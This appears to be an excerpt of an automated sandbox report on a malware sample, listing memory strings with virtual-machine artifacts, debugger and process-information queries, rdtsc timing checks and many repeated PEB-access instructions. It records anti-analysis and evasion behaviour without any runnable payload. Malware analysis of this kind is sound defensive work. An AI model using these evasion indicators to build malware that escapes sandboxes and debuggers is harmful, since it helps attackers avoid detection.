Source: explorer.exe, 0000000E.00000000.445336091.0000000005D50000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 0000000E.00000000.479950310.00000000045BE000.00000004.00000001.sdmp	Binary or memory string: 8f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&
Source: explorer.exe, 0000000E.00000000.452004662.00000000082E2000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 0000000E.00000000.452463166.0000000008430000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
Source: 9thuIDnsFV.exe	Binary or memory string: w9pCcvmCiBslevp3ENTZ7Gyl/KlvjcVV5O5tkWLNvHWw9ziuxOZ14kJmcS95b5CG53h40gwz2mI1prpmN63K34RqlKTfBw\782M5soaHLKwjrxjbF44wWMH/mXEYo9EtG3RCo8RZu8v2iOPMGsDtVxMtQ/RInns4u4kM+YSRbJmUomHt2yet9GjBmvzKjwGocN5e2\7S6Ai96HFLuDqu3p28Ouz3oupVo6bq9Tq4z84+QXrbm011Rn3/M4xD+nOhVufu
Source: explorer.exe, 0000000E.00000000.465503164.000000000095C000.00000004.00000020.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
Source: explorer.exe, 0000000E.00000000.445336091.0000000005D50000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\user\Desktop\9thuIDnsFV.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe

Code function: 10_2_00409A90 rdtsc

10_2_00409A90

Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe

Code function: 10_2_0040ACD0 LdrLoadDll,

10_2_0040ACD0

Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A269A6 mov eax, dword ptr fs:[00000030h]	10_2_01A269A6
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019DFD9B mov eax, dword ptr fs:[00000030h]	10_2_019DFD9B
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019DFD9B mov eax, dword ptr fs:[00000030h]	10_2_019DFD9B
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019D2990 mov eax, dword ptr fs:[00000030h]	10_2_019D2990
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019A2D8A mov eax, dword ptr fs:[00000030h]	10_2_019A2D8A
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019A2D8A mov eax, dword ptr fs:[00000030h]	10_2_019A2D8A
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019A2D8A mov eax, dword ptr fs:[00000030h]	10_2_019A2D8A
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019A2D8A mov eax, dword ptr fs:[00000030h]	10_2_019A2D8A
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019A2D8A mov eax, dword ptr fs:[00000030h]	10_2_019A2D8A
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019DA185 mov eax, dword ptr fs:[00000030h]	10_2_019DA185
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A251BE mov eax, dword ptr fs:[00000030h]	10_2_01A251BE
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A251BE mov eax, dword ptr fs:[00000030h]	10_2_01A251BE
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A251BE mov eax, dword ptr fs:[00000030h]	10_2_01A251BE
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A251BE mov eax, dword ptr fs:[00000030h]	10_2_01A251BE
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019D2581 mov eax, dword ptr fs:[00000030h]	10_2_019D2581
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019D2581 mov eax, dword ptr fs:[00000030h]	10_2_019D2581
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019D2581 mov eax, dword ptr fs:[00000030h]	10_2_019D2581
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019D2581 mov eax, dword ptr fs:[00000030h]	10_2_019D2581
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019CC182 mov eax, dword ptr fs:[00000030h]	10_2_019CC182
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019D1DB5 mov eax, dword ptr fs:[00000030h]	10_2_019D1DB5
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019D1DB5 mov eax, dword ptr fs:[00000030h]	10_2_019D1DB5
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019D1DB5 mov eax, dword ptr fs:[00000030h]	10_2_019D1DB5
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019D35A1 mov eax, dword ptr fs:[00000030h]	10_2_019D35A1
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019D61A0 mov eax, dword ptr fs:[00000030h]	10_2_019D61A0
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019D61A0 mov eax, dword ptr fs:[00000030h]	10_2_019D61A0
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A341E8 mov eax, dword ptr fs:[00000030h]	10_2_01A341E8
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A58DF1 mov eax, dword ptr fs:[00000030h]	10_2_01A58DF1
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A26DC9 mov eax, dword ptr fs:[00000030h]	10_2_01A26DC9
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A26DC9 mov eax, dword ptr fs:[00000030h]	10_2_01A26DC9
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A26DC9 mov eax, dword ptr fs:[00000030h]	10_2_01A26DC9
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A26DC9 mov ecx, dword ptr fs:[00000030h]	10_2_01A26DC9
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A26DC9 mov eax, dword ptr fs:[00000030h]	10_2_01A26DC9
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A26DC9 mov eax, dword ptr fs:[00000030h]	10_2_01A26DC9
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019AB1E1 mov eax, dword ptr fs:[00000030h]	10_2_019AB1E1
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019AB1E1 mov eax, dword ptr fs:[00000030h]	10_2_019AB1E1
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019AB1E1 mov eax, dword ptr fs:[00000030h]	10_2_019AB1E1
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019BD5E0 mov eax, dword ptr fs:[00000030h]	10_2_019BD5E0
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019BD5E0 mov eax, dword ptr fs:[00000030h]	10_2_019BD5E0
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A78D34 mov eax, dword ptr fs:[00000030h]	10_2_01A78D34
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A2A537 mov eax, dword ptr fs:[00000030h]	10_2_01A2A537
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019A9100 mov eax, dword ptr fs:[00000030h]	10_2_019A9100
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019A9100 mov eax, dword ptr fs:[00000030h]	10_2_019A9100
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019A9100 mov eax, dword ptr fs:[00000030h]	10_2_019A9100
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019D4D3B mov eax, dword ptr fs:[00000030h]	10_2_019D4D3B
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019D4D3B mov eax, dword ptr fs:[00000030h]	10_2_019D4D3B
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019D4D3B mov eax, dword ptr fs:[00000030h]	10_2_019D4D3B
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019D513A mov eax, dword ptr fs:[00000030h]	10_2_019D513A
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019D513A mov eax, dword ptr fs:[00000030h]	10_2_019D513A
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019AAD30 mov eax, dword ptr fs:[00000030h]	10_2_019AAD30
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019B3D34 mov eax, dword ptr fs:[00000030h]	10_2_019B3D34
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019B3D34 mov eax, dword ptr fs:[00000030h]	10_2_019B3D34
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019B3D34 mov eax, dword ptr fs:[00000030h]	10_2_019B3D34
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019B3D34 mov eax, dword ptr fs:[00000030h]	10_2_019B3D34
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019B3D34 mov eax, dword ptr fs:[00000030h]	10_2_019B3D34
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019B3D34 mov eax, dword ptr fs:[00000030h]	10_2_019B3D34
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019B3D34 mov eax, dword ptr fs:[00000030h]	10_2_019B3D34
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019B3D34 mov eax, dword ptr fs:[00000030h]	10_2_019B3D34
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019B3D34 mov eax, dword ptr fs:[00000030h]	10_2_019B3D34
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019B3D34 mov eax, dword ptr fs:[00000030h]	10_2_019B3D34
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019B3D34 mov eax, dword ptr fs:[00000030h]	10_2_019B3D34
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019B3D34 mov eax, dword ptr fs:[00000030h]	10_2_019B3D34
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019B3D34 mov eax, dword ptr fs:[00000030h]	10_2_019B3D34
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019C4120 mov eax, dword ptr fs:[00000030h]	10_2_019C4120
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019C4120 mov eax, dword ptr fs:[00000030h]	10_2_019C4120
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019C4120 mov eax, dword ptr fs:[00000030h]	10_2_019C4120
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019C4120 mov eax, dword ptr fs:[00000030h]	10_2_019C4120
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019C4120 mov ecx, dword ptr fs:[00000030h]	10_2_019C4120
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019C7D50 mov eax, dword ptr fs:[00000030h]	10_2_019C7D50
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019CB944 mov eax, dword ptr fs:[00000030h]	10_2_019CB944
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019CB944 mov eax, dword ptr fs:[00000030h]	10_2_019CB944
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019E3D43 mov eax, dword ptr fs:[00000030h]	10_2_019E3D43
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A23540 mov eax, dword ptr fs:[00000030h]	10_2_01A23540
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019AB171 mov eax, dword ptr fs:[00000030h]	10_2_019AB171
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019AB171 mov eax, dword ptr fs:[00000030h]	10_2_019AB171
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019CC577 mov eax, dword ptr fs:[00000030h]	10_2_019CC577
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019CC577 mov eax, dword ptr fs:[00000030h]	10_2_019CC577
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019AC962 mov eax, dword ptr fs:[00000030h]	10_2_019AC962
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019B849B mov eax, dword ptr fs:[00000030h]	10_2_019B849B
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019A9080 mov eax, dword ptr fs:[00000030h]	10_2_019A9080
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019DF0BF mov ecx, dword ptr fs:[00000030h]	10_2_019DF0BF
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019DF0BF mov eax, dword ptr fs:[00000030h]	10_2_019DF0BF
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019DF0BF mov eax, dword ptr fs:[00000030h]	10_2_019DF0BF
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A23884 mov eax, dword ptr fs:[00000030h]	10_2_01A23884
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A23884 mov eax, dword ptr fs:[00000030h]	10_2_01A23884
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019E90AF mov eax, dword ptr fs:[00000030h]	10_2_019E90AF
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019D20A0 mov eax, dword ptr fs:[00000030h]	10_2_019D20A0
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019D20A0 mov eax, dword ptr fs:[00000030h]	10_2_019D20A0
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019D20A0 mov eax, dword ptr fs:[00000030h]	10_2_019D20A0
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019D20A0 mov eax, dword ptr fs:[00000030h]	10_2_019D20A0
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019D20A0 mov eax, dword ptr fs:[00000030h]	10_2_019D20A0
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019D20A0 mov eax, dword ptr fs:[00000030h]	10_2_019D20A0
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A26CF0 mov eax, dword ptr fs:[00000030h]	10_2_01A26CF0
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A26CF0 mov eax, dword ptr fs:[00000030h]	10_2_01A26CF0
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A26CF0 mov eax, dword ptr fs:[00000030h]	10_2_01A26CF0
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A614FB mov eax, dword ptr fs:[00000030h]	10_2_01A614FB
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A78CD6 mov eax, dword ptr fs:[00000030h]	10_2_01A78CD6
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A3B8D0 mov eax, dword ptr fs:[00000030h]	10_2_01A3B8D0
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A3B8D0 mov ecx, dword ptr fs:[00000030h]	10_2_01A3B8D0
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A3B8D0 mov eax, dword ptr fs:[00000030h]	10_2_01A3B8D0
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A3B8D0 mov eax, dword ptr fs:[00000030h]	10_2_01A3B8D0
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A3B8D0 mov eax, dword ptr fs:[00000030h]	10_2_01A3B8D0
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A3B8D0 mov eax, dword ptr fs:[00000030h]	10_2_01A3B8D0
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019A58EC mov eax, dword ptr fs:[00000030h]	10_2_019A58EC
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A61C06 mov eax, dword ptr fs:[00000030h]	10_2_01A61C06
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A61C06 mov eax, dword ptr fs:[00000030h]	10_2_01A61C06
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A61C06 mov eax, dword ptr fs:[00000030h]	10_2_01A61C06
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A61C06 mov eax, dword ptr fs:[00000030h]	10_2_01A61C06
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A61C06 mov eax, dword ptr fs:[00000030h]	10_2_01A61C06
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A61C06 mov eax, dword ptr fs:[00000030h]	10_2_01A61C06
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A61C06 mov eax, dword ptr fs:[00000030h]	10_2_01A61C06
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A61C06 mov eax, dword ptr fs:[00000030h]	10_2_01A61C06
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A61C06 mov eax, dword ptr fs:[00000030h]	10_2_01A61C06
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A61C06 mov eax, dword ptr fs:[00000030h]	10_2_01A61C06
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A61C06 mov eax, dword ptr fs:[00000030h]	10_2_01A61C06
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A61C06 mov eax, dword ptr fs:[00000030h]	10_2_01A61C06
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A61C06 mov eax, dword ptr fs:[00000030h]	10_2_01A61C06
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A61C06 mov eax, dword ptr fs:[00000030h]	10_2_01A61C06
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A26C0A mov eax, dword ptr fs:[00000030h]	10_2_01A26C0A
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A26C0A mov eax, dword ptr fs:[00000030h]	10_2_01A26C0A
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A26C0A mov eax, dword ptr fs:[00000030h]	10_2_01A26C0A
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A26C0A mov eax, dword ptr fs:[00000030h]	10_2_01A26C0A
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A7740D mov eax, dword ptr fs:[00000030h]	10_2_01A7740D
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A7740D mov eax, dword ptr fs:[00000030h]	10_2_01A7740D
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A7740D mov eax, dword ptr fs:[00000030h]	10_2_01A7740D
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019D002D mov eax, dword ptr fs:[00000030h]	10_2_019D002D
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019D002D mov eax, dword ptr fs:[00000030h]	10_2_019D002D
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019D002D mov eax, dword ptr fs:[00000030h]	10_2_019D002D
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019D002D mov eax, dword ptr fs:[00000030h]	10_2_019D002D
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019D002D mov eax, dword ptr fs:[00000030h]	10_2_019D002D
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019BB02A mov eax, dword ptr fs:[00000030h]	10_2_019BB02A
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019BB02A mov eax, dword ptr fs:[00000030h]	10_2_019BB02A
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019BB02A mov eax, dword ptr fs:[00000030h]	10_2_019BB02A
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019BB02A mov eax, dword ptr fs:[00000030h]	10_2_019BB02A
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019DBC2C mov eax, dword ptr fs:[00000030h]	10_2_019DBC2C
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A74015 mov eax, dword ptr fs:[00000030h]	10_2_01A74015
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A74015 mov eax, dword ptr fs:[00000030h]	10_2_01A74015
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A27016 mov eax, dword ptr fs:[00000030h]	10_2_01A27016
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A27016 mov eax, dword ptr fs:[00000030h]	10_2_01A27016
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A27016 mov eax, dword ptr fs:[00000030h]	10_2_01A27016
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019C0050 mov eax, dword ptr fs:[00000030h]	10_2_019C0050
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019C0050 mov eax, dword ptr fs:[00000030h]	10_2_019C0050
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A71074 mov eax, dword ptr fs:[00000030h]	10_2_01A71074
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A62073 mov eax, dword ptr fs:[00000030h]	10_2_01A62073
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019DA44B mov eax, dword ptr fs:[00000030h]	10_2_019DA44B
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019C746D mov eax, dword ptr fs:[00000030h]	10_2_019C746D
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A3C450 mov eax, dword ptr fs:[00000030h]	10_2_01A3C450
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A3C450 mov eax, dword ptr fs:[00000030h]	10_2_01A3C450
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A75BA5 mov eax, dword ptr fs:[00000030h]	10_2_01A75BA5
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019D2397 mov eax, dword ptr fs:[00000030h]	10_2_019D2397
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019DB390 mov eax, dword ptr fs:[00000030h]	10_2_019DB390
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019B8794 mov eax, dword ptr fs:[00000030h]	10_2_019B8794
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019B1B8F mov eax, dword ptr fs:[00000030h]	10_2_019B1B8F
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019B1B8F mov eax, dword ptr fs:[00000030h]	10_2_019B1B8F
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A5D380 mov ecx, dword ptr fs:[00000030h]	10_2_01A5D380
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A6138A mov eax, dword ptr fs:[00000030h]	10_2_01A6138A
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019D4BAD mov eax, dword ptr fs:[00000030h]	10_2_019D4BAD
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019D4BAD mov eax, dword ptr fs:[00000030h]	10_2_019D4BAD
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019D4BAD mov eax, dword ptr fs:[00000030h]	10_2_019D4BAD
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A27794 mov eax, dword ptr fs:[00000030h]	10_2_01A27794
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A27794 mov eax, dword ptr fs:[00000030h]	10_2_01A27794
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A27794 mov eax, dword ptr fs:[00000030h]	10_2_01A27794
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A253CA mov eax, dword ptr fs:[00000030h]	10_2_01A253CA
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_01A253CA mov eax, dword ptr fs:[00000030h]	10_2_01A253CA
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019E37F5 mov eax, dword ptr fs:[00000030h]	10_2_019E37F5
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019CDBE9 mov eax, dword ptr fs:[00000030h]	10_2_019CDBE9
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019D03E2 mov eax, dword ptr fs:[00000030h]	10_2_019D03E2
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019D03E2 mov eax, dword ptr fs:[00000030h]	10_2_019D03E2
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019D03E2 mov eax, dword ptr fs:[00000030h]	10_2_019D03E2
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019D03E2 mov eax, dword ptr fs:[00000030h]	10_2_019D03E2
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019D03E2 mov eax, dword ptr fs:[00000030h]	10_2_019D03E2
Source: C:\Users\user\AppData\Local\Temp\9thuIDnsFV.exe	Code function: 10_2_019D03E2 mov eax, dword ptr fs:[00000030h]	10_2_019D03E2
